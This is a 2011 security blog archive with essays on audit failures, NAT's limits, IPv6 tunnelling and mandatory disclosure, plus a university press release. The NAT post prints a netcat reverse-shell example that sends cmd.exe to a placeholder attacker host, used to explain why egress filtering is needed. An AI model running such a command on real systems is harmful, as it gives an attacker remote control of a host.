Saturday, 8 October 2011

Security News and Views weekly podcast

The Security News and Views weekly podcast is up and ready for your weekly security news updates. It covers some of the things I found of interest during the week, in MP3 and PDF format.

http://craigswright.podbean.com/2011/10/08/security-news-and-views/

We test insecurity but do not measure security

Right now, we test insecurity and believe that this makes us secure.

Even the methods are wrong. One of the fundamentals of science is that we cannot prove a negative. Some dispute this, but they fail to understand the concept of proof. What we do is provide evidence to support a hypothesis. Basically, we select a likely postulate based on what the evidence at hand seems to tell us.

Now, what we cannot do is assert that we have seen all failures and thus that no failures exist. Moreover, we cannot assert that we have seen all the vulnerabilities we can ever expect.

He who knows only his own side of the case, knows little of that. His reasons may be good, and no one may have been able to refute them. But if he is equally unable to refute the reasons on the opposite side; if he does not so much as know what they are, he has no ground for preferring either opinion. [1]

This is cogent when we consider how we look at security testing. Do not get me wrong, penetration testing has a place. When conducted by a skilled (and it is by far an art and not a science) tester, penetration testing can have positive effects. It can be used to display the holes we have in a system and to have management and others take an issue seriously.

What an ethical attack or penetration test cannot do is tell us we are secure.

The best we can hope for is that we have:

  • A skilled tester on a good day [3],
  • That we were fortunate enough to have the test find the main vulnerabilities within the scope and time constraints [2],
  • That we happened to be lucky enough to actually find the flaws [4], and
  • That the flaws were open at the time of testing.
These, of course, are only the tip of the iceberg; basically, what a penetration test tells us is that we have no glaringly open holes within the scope of the report (we hope).

That does not mean we are secure.

In an upcoming paper [5] to be presented at the 2011 International Conference on Business Intelligence and Financial Engineering in Hong Kong in December, we report the results of common system audits.

Not that I see this as winning myself any popularity with auditors and testers (nor do I think I will be working for an audit firm ever again following the release of the paper), but we show that many systems that are said to be secure as a result of passing a compliance check are not actually secure.

Basically, there are few incentives other than reputation to hold a tester to account, and many with inadequate skills fill the field. The reason, we believe, is that there is little downside: it is easy, even as a poorly skilled tester, to maintain a business and gain work in this field.

It is an all too common state of affairs to see the software vendors blamed for the lack of security in systems, but it is rare to see the auditors and testers called to account. We propose the notion of negligence and tort-based responsibility against the inattentive auditor. This would have the auditor liable for errors and failures, with a comparative liability scheme to enforce it, such that a client's failure to implement controls in a timely manner, or its hiding of information from the auditor, would mitigate the auditor's liability.

This would require a radical rethinking of the ways that we currently implement and monitor information security and risk. In place of testing common checklist items such as password change policy and determining the existence of controls [1], a regime of validating the effectiveness and calculating the survivability of the system is proposed.

What we tested
In a review of 1,878 audit and risk reports conducted on Australian firms by the top 8 international audit and accounting firms, 29.8% of tests evaluated the effectiveness of the control process. Of these 560 reports, 78% of the controls tested were confirmed through the assurance of the organization under audit. The systems were validated to any level in only 6.5% of reports. Of these, the process rarely tested for effectiveness, but instead tested that the controls met the documented process. Audit practice in US and UK based audit firms does not differ significantly.

Installation guidelines provided by the Center for Internet Security (CISecurity) [2] openly provide system benchmarks and scoring tools that contain the “consensus minimum due care security configuration recommendations” for the most widely deployed operating systems and applications in use. The baseline templates will not themselves stop a determined attacker, but they can demonstrate minimum due care and diligence. Only 32 of the 542 organizations analysed in this paper deploy this form of implementation standard.
Figure. Patching, just enough to be compliant, too little to be secure.

The patch levels of many systems are displayed in the figure above. The complete data will be released in the paper [5].

What we do see, however, is that many systems are not maintained. Core systems including DNS, DHCP, routers and switches are often overlooked. In particular, core switches were found to be rarely maintained in any but a few organisations, and even in penetration tests these are commonly overlooked (it was truly rare to see them checked in an audit).

As Aristotle (350 BCE) noted:
“The same is true of crimes so great and terrible that no man living could be suspected of them: here too no precautions are taken. For all men guard against ordinary offences, just as they guard against ordinary diseases; but no one takes precautions against a disease that nobody has ever had.”

Incomplete information is not to be confused with imperfect information in which players do not perfectly observe the actions of other players. The purpose of audit is to minimize the probability of incomplete information being used by management. For this to occur, information needs to be grounded in fact and not a function of simplicity and what other parties do.

Most security compromises are a result of inadequate or poorly applied controls. They are rarely the “disease that nobody has ever had.”
 
Businesses need to demand more thorough audits, with results that go beyond simply meeting a compliance checklist. These must include patching at all levels of the software stack (both system and applications) as well as the firmware of the hardware it runs on. The failure of audits to "think outside the box", acting only as a watchdog, could ultimately be perceived as negligence on the part of all involved.

[1] Such control checks as anti-virus software licenses being up to date and a firewall being installed are common checklist items on most audits. Checks that the anti-virus software is functional or that the firewall policy is effective are rarely conducted.
[2] CIS benchmark and scoring tools are available from http://www.cisecurity.org/

References:
[1] Mill, J. S., “On Liberty”.
[2] Wright, C. (2006) “Ethical Attacks miss the point!”, System Control Journal, ISACA.
[3] Wright, C. “Where Vulnerability Testing Fails”, System Control Journal, ISACA (extended SANS Reading Room paper linked).
[4] Wright, C. (2005) “Beyond Vulnerability Scans — Security Considerations for Auditors”, ITAudit, Vol. 8, 15 Sept 2005, The IIA, USA.
[5] Wright, C. “Who pays for a security violation? An assessment into the cost of lax security, negligence and risk, a glance into the looking glass.”

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous postgraduate degrees, including an LLM specializing in international commercial law and e-commerce law and a Master's degree in mathematical statistics from Newcastle, and is working on his fourth IT-focused Master's degree (Systems Development) at Charles Sturt University, where he lectures in a Master's degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk, at CSU.

Friday, 7 October 2011

Flexibility the key to the Doctorate

The following is a press release for the DIT program at CSU. We plan to have over 100 new doctoral students in the next year with a focus on digital forensics and information security research. This will be applied research.

For those who do not think they can do a doctorate, this program has been structured in steps:

  1. Postgraduate Certificate
  2. Masters by Research
  3. Doctor of Information Technology
The program is industry-focused. We plan to build the research skills that are needed in industry and government, the skills needed for a new form of education.

Soon after this, I will be announcing a formal plan for open, community-sourced information systems security and digital forensics training and education. We are constructing a community-based education resource. This will consist of:
  1. Training papers
  2. Audio lectures
  3. Video guides
The aim will be to openly train over 20,000 security professionals by 2020: 20,000 people with a high level of skill. Achieving that will of course require far more people to be trained.

Our goal is to have a resource available to the world that will allow a novice security professional to follow step by step guidelines in securing and responding to their organization's systems. For instance, we would like to see a junior incident responder able to use a tablet, follow a series of commands and step through a video on how to image a drive on a potentially compromised system.

More information will be coming in the weeks ahead.

The release:
Already the market leader in domestic IT postgraduate course enrollments, Charles Sturt University (CSU) plans to be the leading IT research university by 2017.

As part of this strategy, CSU have launched a revised Doctor of Information Technology today, offering a unique Doctorate that is industry-relevant, flexible and industry-based.

The doctorate market has experienced strong growth, with over 43,000 students undertaking doctorates at Australian universities in 2008, and this continues to increase as the industry grows.

“Charles Sturt University has gathered feedback from potential students, graduates and industry leaders to discover what’s needed in a Doctorate of IT,” CSU School of Computing and Mathematics adjunct lecturer Mr Martin Hale said. “We discovered there were three main barriers for people who were thinking of taking on this level of study and they were the size of the commitment, the perception that technically qualified supervisors would not be available and the belief that there was a lack of employer support. These three barriers have been addressed within the development of this restructured course.”

The restructured course will give students the option of exiting with a Graduate Certificate or Masters, and Mr John Ridge AM, Executive Officer at the Australian Computer Society (ACS) and a strong supporter of the Doctorate course, believes this will take the risk out of committing to a full Doctorate in a set time period.

“People can exit at different points and they exit with a qualification.  This provides the opportunity to obtain those points and then, if you need to exit you can, with qualifications. You can take a break for a while and then pick it up again. It’s great to have this flexibility without losing the time you’ve put into it.”

IT Masters has identified a pool of potential Adjunct Industry supervisors who have undertaken the CSU supervisory training program before being allocated a student. One of these supervisors is Charles Sturt University (CSU) adjunct lecturer, Asia Pacific Director of the Global Institute for Cybersecurity + Research and leading Australian cyber security expert, Dr Craig Wright.

“The reason professionals undertake a doctorate is to differentiate themselves in a growing workforce and this restructure offers one of the most flexible and work-relevant courses available.

“My background is in information security and forensics, which is a growing area within the industry, and software security and digital forensics are areas the doctorate will address. Students can be assured that supervisors have the technical expertise in highly specialised areas like this and can therefore help them with their studies.”

In the research conducted, most prospective students indicated that they would be approaching their employers to help fund their studies but doubted they would get support, as the only output was a thesis that would not be available for at least six years.
“Rather than pure academic papers, the restructure has included White Papers, or applied papers, giving employers tangible outcomes within an acceptable timeframe that makes a difference now,” Mr Hale said.

“The relationship Charles Sturt University has with the IT industry is something that other universities do not have,” Mr Ridge said. “This industry flexibility and industry focus is a good thing. There is a wave of change in some academic circles where this Doctorate is going.”

“People are looking for a doctorate that offers more applied research rather than pure research and this one delivers. I’m a big fan of Charles Sturt University’s IT Masters for the same reason – there are industry-relevant qualifications and embedded in the qualification is industry certification. The Doctorate is continuing the same sort of trend but taking it to a new level.”

Tuesday, 4 October 2011

More Netstat


Did you know that you could turn netstat into a simple port monitor and reporter?

In this session we discuss all the things you likely did not know that netstat for Windows could do, such as monitoring web sessions with:
netstat -nao 5 | find ":80 "
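
Netstat can do a good deal more than that. A few more examples in the same vein (all of these are standard switches in the Windows version of netstat; the -b switch needs an elevated prompt):

:: Show which executable opened each connection (run elevated)
netstat -naob

:: Interface and per-protocol statistics, handy for spotting climbing error counters
netstat -es

:: Snapshot the listening TCP ports with their owning PIDs as a baseline
netstat -nao | find "LISTENING" > baseline-ports.txt

Comparing a fresh snapshot against the baseline file is a quick way to spot a new listener that should not be there.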

NAT is secure? Think again

Again and again I hear how NAT is secure. Just the other day, in response to a post I made, it was argued that:
NATs are quite simple: an external point of access forwards data to an internal computer. This forwarding is governed by existing connections, rules set up based on protocol information or forwarded to a default host that takes care of manipulating and forwarding data to an inaccessible internal computer.

Again, to paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.
I have written on this topic in the past. What seems to be missed is that it is actually simple to set up connections out through a NAT-based device. This is known as shovelling a shell. Basically, NAT (network address translation) is not a security mechanism; we just use it as such.
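
As a minimal sketch of shovelling a shell (the host name is a placeholder, and this assumes a netcat build compiled with -e support):

:: On the attacker's publicly reachable host, wait for the shell to arrive:
nc -l -v -p 443

:: On the victim behind NAT: the connection is OUTBOUND, so the NAT device
:: forwards it without complaint and hands the attacker a command shell:
nc attacker.example.com 443 -e cmd.exe

NAT only interferes with unsolicited inbound connections; anything the inside host initiates, including handing a shell to an attacker, sails straight through.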

Right now, NAT provides some protection from scanning worms and randomised attacks. The thing is, this is not how systems are being compromised any more. NAT does not stop browser-based attacks, malware, PDF exploits, Flash-based rebinding attacks… I could go on.

Home systems are one thing; NAT is still not going to do a great deal in the long run, but it is better than nothing.

However, SCADA systems are not adequately secured using NAT.

These are critical systems that are targeted and at high risk; at times the destruction of such a system can result in kinetic effects. You do not require a Stuxnet-class worm to break a system; that level of sophistication is only needed for fine control. Many groups simply desire anarchy and chaos, and for this the destruction of a system will suffice.
We cannot continue to call systems firewalled simply because they have a NAT device between them and the Internet.

What can we do?
For a start, limit outgoing access. Add extrusion filters and stop open access. You do not NEED the entire Internet.

Basically, you should do the following at a minimum (this is not a home user solution other than for the technically insane such as myself):

  • Limit all access to only selected ports.
  • Use DNS forwarders. Split-split DNS is recommended for many reasons. One is that it also stops many forms of exfiltration of data over these ports (though even then still not all).
  • Use a web proxy. This can be a simple forwarder with nothing but logging, but the addition of a simple forwarder will stop some exfiltration over the web (although SSL remains an issue here).
  • Block all outgoing SMTP email sessions (other than to allowed servers). Why make it easy for the spammers?
  • Force client hosts to connect to servers and add control points.
Use a risk-based approach to security. If you run a system whose compromise can result in high-value losses or, worse, the loss of life, then you need to ensure that you do more than simple NAT filtering.
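
As a sketch of what a default-deny egress policy can look like on a host using the built-in Windows firewall (the rule names and the addresses of the DNS forwarder, web proxy and mail relay are assumptions for illustration):

:: Default-deny in both directions, then permit only what the business needs
netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound

:: Clients may resolve names only through the internal DNS forwarder
netsh advfirewall firewall add rule name="Allow DNS forwarder" dir=out action=allow protocol=UDP remoteport=53 remoteip=10.0.0.53

:: Web traffic leaves only via the logging proxy
netsh advfirewall firewall add rule name="Allow web proxy" dir=out action=allow protocol=TCP remoteport=8080 remoteip=10.0.0.80

:: Nothing but the mail relay speaks SMTP to the outside world
netsh advfirewall firewall add rule name="Block direct SMTP" dir=out action=block protocol=TCP remoteport=25

The same policy should of course be expressed on a perimeter device as well; the point is the default-deny posture, not the product.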

IPv6 is a game changer
Soon (and some places have already moved to IPv6), we are going to lose even the rudimentary obscurity that NAT provided. IPv6 does not work well with firewalls, as much as we try to fool ourselves into the misguided belief that it does and that we can maintain the crunchy-shell approach we have loved to rely on for the past couple of decades.

Tunnelling already means that many organisations are connected to the IPv6 Internet through protocols such as Teredo without even knowing it. NAT does not actually do anything to stop this, and many hosts are simply connected to the IPv6 Internet already. The one fortunate aspect is that attackers cannot expect to scan hosts randomly in the IPv6 world, but again the protection is obscurity and not a real control.
If you run Windows 7 and you allow outgoing UDP, you are likely already connected to the IPv6 Internet without any firewalling. This includes hosts hiding behind NAT. Tunnels remove NAT-based controls.
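
A quick way to check whether this applies to you on Windows 7, and to switch the transition tunnels off until you have a deliberate IPv6 deployment plan:

:: Is a Teredo interface already up and qualified?
netsh interface teredo show state

:: Disable the common transition tunnels (Teredo, 6to4, ISATAP)
netsh interface teredo set state disabled
netsh interface 6to4 set state disabled
netsh interface isatap set state disabled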

The thing is, with IPv6, everything starts to be a part of the cloud!
Using routed IP addresses, tunnels and mobile IP means that we are all located internally, externally and everywhere, all of the time. The cloud is not something out there; it will be something INSIDE your network soon (if, with tunnels, it is not already).

Disease models…
There is a reason we name malicious code after disease terms: worms, viruses and so on. They mirror many of the same effects.

What we need to start to do when thinking about both cloud and IPv6 models is to create isolation and quarantine points. Peer systems should not need to talk directly to one another and can be controlled at organisational choke points. In the coming weeks I will be providing a session to government. This will be recorded and in time made available freely online. I will post as this occurs.

In a disease control scenario, we set quarantine breakpoints and controls. We do not allow all systems to talk to all systems. With multicast groups and the Security Association Database in IPSec, we can actually do this in a manner that makes each system its own firewalled domain. Right now, this seems difficult to most people, but it does not need to be. So, keep reading and I will start to add processes in the coming weeks on how to achieve this within an organisation.
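
On Windows, one sketch of such a quarantine point is a connection security rule that requires IPsec authentication before a peer may talk to a host at all (the rule name is illustrative, and this assumes domain-joined machines so that Kerberos can carry the authentication):

:: Require authenticated IPsec on all traffic to and from this host
netsh advfirewall consec add rule name="Host isolation" endpoint1=any endpoint2=any action=requireinrequestout auth1=computerkerb

Combined with firewall rules that admit only authenticated machines, each host effectively becomes its own firewalled domain: the quarantine breakpoint described above.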

I will be talking more of this approach in the coming weeks.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous postgraduate degrees, including an LLM specializing in international commercial law and e-commerce law and a Master's degree in mathematical statistics from Newcastle, and is working on his fourth IT-focused Master's degree (Systems Development) at Charles Sturt University, where he lectures in a Master's degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk, at CSU.

Monday, 3 October 2011

A goodbye to one in our field

Dr. Gene Schultz, security leader, author and devoted teacher, passed away today after a stroke.

He was a great man and one of the leaders in our field. I would like to take the time to say he will be missed.

Doctor of Information Technology (DIT) Course

CSU have re-designed the Doctor of Information Technology (DIT) course in collaboration with IT Masters Pty Ltd. The new version of the DIT will better serve the IT industry and its research training needs. The new course targets various market segments: from those who wish to enhance their skills in developing white papers for the IT industry, to those who plan to examine current practical research issues that the IT industry is facing.

We have a focus on applied security and digital forensic research at the doctoral level.

The new DIT course will be launched at the Australian Computer Society (ACS) Foundation office in Sydney (Level 11, 50 Carrington Street) on Friday, 7 October 2011, commencing at 5.30 pm. I will provide details of all this soon.

On disclosure

In my twenty-plus years in information security I have seen many things. I started, as many in the security world do, with the view that we need to maintain secrecy; that obscurity has some (even if minor) effect. However, over the years, and in completing over 1,000 reviews and audits in those decades, I have documented and watched the effects of darkness on security.

The results have changed my view from one of covering the truth in order to minimise damage to the sunshine principle: only when we bring exploits into the light of day can we hope to counter them. This is not simply a matter of personal opinion, but of the one science that can help us measure these effects: economics. Everything has a cost, and only by treating security as a relative and not an absolute can we hope to effectively protect our systems and, through them, society.

In writing on SCADA issues, I have been told that I will never see another audit of such a system. That is clearly false, as some of my best supporters in this are clients. There are those who will not hire me for saying that I want things open, and these are also the types of people I would never want to deal with again. There is a reason for this: those who run SCADA systems responsibly suffer greater costs and are less efficient in the short term than those who cut corners. The difference comes in the long term, but this in itself can be problematic.

In my years testing systems and responding to incidents, I have seen more failures than I care to remember. Some have been spectacularly complex; others have been dismal, and it amazed me how poorly the controls could be set.

Right now, we do not have to report system breaches in most places. The result is that for every public breach (and there are many), we see but the tip of the iceberg. From my experience, and this is simply anecdotal, I would estimate that 100 or more breaches occur for each one that becomes publicly known.

It has been demonstrated that security disclosure has a negative impact on a company’s share price. This depends strongly on the nature of the organisation. Some organisations actually have no economic impact from a breach. For others, the effect is catastrophic.

Toys [1], vendors and the existing compliance regime have to take some of the blame for the failures we see. I worked with one critical system using SCADA equipment that managed to pass audits for five years running. An independent analysis of the system concluded that if this system failed, upwards of 30,000 lives could be lost as an expected risk value. The system was at one stage infected with a scanning worm and Trojan. We contained the worm, but the system was never rebuilt.

The answer was to implement firewalls and monitoring controls that stopped the Trojan from connecting to a C&C server.

We talk of the difficulty in creating a Stuxnet-type code sample, but we forget that the aims of Stuxnet involved fine control. The creators wanted a specific outcome. That is difficult to achieve. Chaos, on the other hand, is simple. Maintaining systems is difficult and requires more knowledge and sophistication than most groups have. Crashing critical monitoring systems, on the other hand, is easy.

I like aircraft systems; for the most part, even though they have issues from time to time, the people I worked with in the past always took matters seriously. I note these because they are among the better-run systems: when we see even the best systems have issues, it puts into the light those systems whose operators do far less to ensure they remain secure.

Even the best-run and maintained systems suffer from problems. In Gatelink and engine management, Boeing once had only WEP implemented over the 802.11b connections. This has now improved, and EAP-TLS with AES using mutually authenticated endpoints is the norm, but it was only testing and discovery that made this change occur.

Moreover, it was necessary to actually demonstrate that a line-of-sight connection using a focused antenna could be made from a fishing boat 2 km away and still send and receive data. The initial belief was that a directionally focused antenna would restrict the range at which wireless signals could be intercepted. Yes, this is only available on the ground, and specialist knowledge of the systems is necessary. That is also a problem: even in controlled systems, we see the designs and schematics leaked onto the Internet and P2P networks.

Security through obscurity is simply false security and leaves us vulnerable with no way to measure the true risk.

So, I have become a proponent of mandatory disclosure.

The reporting of news and events is in itself a problem. We rarely report on the wins and simply sensationalise the losses. Instead of commending companies for what they do right, we look at failures and respond with nothing but knee-jerk reactions and firefighting.

We are about to enter a world where everything is online. My DVD player is online, and I have ordered Internet-connected wireless light globes for testing. With IPv6 finally just around the corner, we will see many of the controls we have relied on fail us. NAT (network address translation) and firewalls fail under the distributed architecture model of IPv6. These have offered some control and protection for a while, but that time has long passed.

With a little knowledge, one can do a Google search on a SCADA or PLC system and find multiple examples of systems that are supposed to be air-gapped and never connected to the world, yet sit online and vulnerable to attack. We have to start treating the risks associated with these systems seriously and stop putting our heads in the sand. We are already seeing attacks against SCADA systems. Why are these not all being taken down now, causing loss and damage? Well, one aspect is that they are being Trojanised and remotely controlled. Not for an effect now, but held in reserve.

Carl von Clausewitz wrote how “the backbone of surprise is fusing speed with secrecy.” We provide that secrecy when we allow compromised systems to remain online, when we hide the fact that our critical systems have been compromised. He further reminded us that “War is not an independent phenomenon, but the continuation of politics by different means.”

We are seeing the Chinese and North Koreans compromise more and more critical systems each week. Some of these are in the press, but these are either the failures or the systems that are already mined for all they are worth. For the most part, these breaches remain secret and out of public purview. To the North Koreans, the entire purpose of a computer network seems to be as a platform for politics through any means.

To paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.

Judge Learned Hand formulated a legal rule: everything has to be measured in terms of ensuring that “B < PL”. That is, the burden of untaken precautions (B) has to be less than the product of the probability of an outcome (P) and the severity of that outcome (L).
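
As a worked example (the figures are invented purely for illustration): suppose a precaution costs $50,000 to implement and would prevent a breach with a 5% annual likelihood and a $2,000,000 impact. Then

B = $50,000 < P × L = 0.05 × $2,000,000 = $100,000

and the rule says the precaution should be taken; on Hand's formulation, failing to take it is negligence.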

This is more than simply looking at short-term costs and effects; it takes in the probability of more dire events and consequences as well. To apply Judge Hand’s rule, we cannot hide in the dark; we need to expose the disease that compromises many of our security controls to the antiseptic of sunlight.

Now, my focus is on teaching. I still do some work and consulting, but only because I do not believe a teacher who is teaching security can do so without exposure to the “real world”. If I never again work on sites that want an audit merely to fulfil a compliance obligation without actually taking the risks seriously, I could not be happier.

Frankly, it is about time we actually started to expose risks and then allow society to place a value on these risks.

[1] I define “Toys” as security product for the sake of product. A prime example is IDS without monitoring and/or tuning.

Sunday, 2 October 2011

Thought for the night

Carl von Clausewitz wrote how “the backbone of surprise is fusing speed with secrecy.” We provide that secrecy when we allow compromised systems to remain online, when we hide the fact that our critical systems have been compromised. He further reminded us that “War is not an independent phenomenon, but the continuation of politics by different means.”

We are seeing the Chinese and North Koreans compromise more and more critical systems each week. Some of these are in the press, but these are either the failures or the systems that are already mined for all they are worth. For the most part, these breaches remain secret and out of public purview. To the North Koreans, the entire purpose of a computer network seems to be as a platform for politics through any means.

To paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.

Security News and Views

The security podcast and PDF for this week is up. Late by a day, but there.

http://craigswright.podbean.com/2011/10/01/security-news-and-views/